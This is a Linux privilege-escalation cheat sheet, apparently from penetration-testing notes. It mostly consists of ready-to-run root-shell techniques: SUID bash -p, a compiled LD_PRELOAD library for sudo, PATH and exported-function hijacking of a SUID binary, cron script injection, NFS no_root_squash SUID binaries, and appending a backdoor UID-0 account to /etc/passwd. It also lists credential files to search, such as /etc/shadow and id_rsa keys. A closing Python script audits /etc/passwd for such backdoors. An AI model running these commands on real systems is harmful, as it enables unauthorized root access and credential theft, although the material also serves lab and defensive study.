Linux
LinPEAS, WinPEAS, etc.
https://github.com/carlospolop/PEASS-ng
https://github.com/rebootuser/LinEnum
https://github.com/mzet-/linux-exploit-suggester
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/linted/linuxprivchecker
GTFOBins
https://gtfobins.github.io/gtfobins
Sudo perms
sudo -l # View sudo perms.
If sudo -l shows that you may run something as another user, run it with sudo -u otheruser command.
Stickies (SUID binaries)
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
If /bin/bash has the SUID bit set, /bin/bash -p gives a privileged shell (-p keeps the effective UID instead of dropping it).
Source : https://medium.com/go-cyber/linux-privilege-escalation-with-suid-files-6119d73bc620
Find writable files
find . -writable
find / -type d -writable -print 2>/dev/null # Find writable directories, printed with their full path
Config files with possible stored credentials
/home/user/myvpn.ovpn
/etc/openvpn/auth.txt
/home/user/.irssi/config
~/.bash_history
Weak File Permissions
Files that may be exploitable if their permissions are weak (readable or writable by an unprivileged user).
/etc/shadow # For getting password hashes
/etc/sudoers
SSH Keys
# Make sure id_rsa perms are changed to 400 if you want to use them.
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null # Lists id_rsa keys that are readable.
Abusing Intended Functionality
sudo apache2 -f /etc/shadow # Using apache permissions to read files.

Sudo (LD_PRELOAD)
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid/setgid prototypes */

/* _init runs when the library is loaded, before the target program's main. */
void _init() {
    unsetenv("LD_PRELOAD"); /* so the spawned shell does not load this library again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Save as x.c and compile with: gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles
Run sudo LD_PRELOAD=/tmp/x.so <any binary sudo -l lets you run>. This only works when sudoers preserves the variable, i.e. env_keep+=LD_PRELOAD appears in the sudo -l output.
Environment Variables - SUID
find / -type f -perm -04000 -ls 2>/dev/null # Note the SUID binaries.
strings /usr/local/bin/suid-env # Note functions used by binary
Notice that this suid-env binary calls the "system" function.
#Exploit Method 1 - Using "system" function
Make the exploit file to be compiled.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
Compile it
gcc /tmp/service.c -o /tmp/service
Export path
export PATH=/tmp:$PATH
Run binary
/usr/local/bin/suid-env
In this variant the SUID binary calls /usr/sbin/service by its absolute path, so a PATH change alone does not help.
#Exploit Method 2 - using /usr/sbin/service
Make the function
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
Export function to shell
export -f /usr/sbin/service # -f indicates that you are exporting a function
Capabilities - similar to SUID
Example: if the python binary has the cap_setuid+ep capability set
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Cron Jobs
cat /etc/crontab # Check for any jobs that might be running scripts
#If you can edit a cron job you can echo in your command.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> script.sh
#You would then run bash from tmp where you just copied it to.
/tmp/bash -p
NFS (no_root_squash)
cat /etc/exports # Look for "no_root_squash" option
#List mountable folders
showmount -e VictimIP
#Make folder in tmp.
mkdir /tmp/mounted
#Mount the folder.
mount -o rw,vers=2 VictimIP:/tmp /tmp/mounted
#Echo your exploit code to the mounted folder.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/mounted/x.c
#Compile code with gcc
gcc /tmp/mounted/x.c -o /tmp/mounted/x
#Change perms for binary
chmod +s /tmp/mounted/x
Run the Binary on the victim machine for privilege escalation.
Writeable /etc/passwd
openssl passwd -1 -salt password password
echo 'owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash' >> /etc/passwd
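A defensive counterpart, added here as an example and not part of the original notes: a small Python audit that flags the traces the technique above leaves in /etc/passwd (an extra UID-0 account and a crypt hash stored directly in the password field). The sample input is constructed and reuses the page's own example entry.

```python
import re

# Constructed sample in /etc/passwd format (not taken from a real host);
# the last line is the entry appended by the technique described above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash
"""

# crypt(3)-style hash prefixes: $1$ (md5), $5$ (sha256), $6$ (sha512), $y$ (yescrypt), ...
HASH_RE = re.compile(r"^\$[0-9a-zA-Z]+\$")


def audit_passwd(text):
    """Return a list of (username, reason) findings for suspicious passwd entries."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        # Only root should own UID 0; any other UID-0 account is a backdoor indicator.
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account other than root"))
        # On a shadowed system the password field is 'x' (or a lock marker);
        # a real hash here bypasses /etc/shadow entirely.
        if HASH_RE.match(pw):
            findings.append((name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        # An empty field means login with no password at all.
        if pw == "":
            findings.append((name, "empty password field"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{user}: {reason}")
```

To run it against a live system, pass the contents of /etc/passwd to audit_passwd instead of the constructed sample.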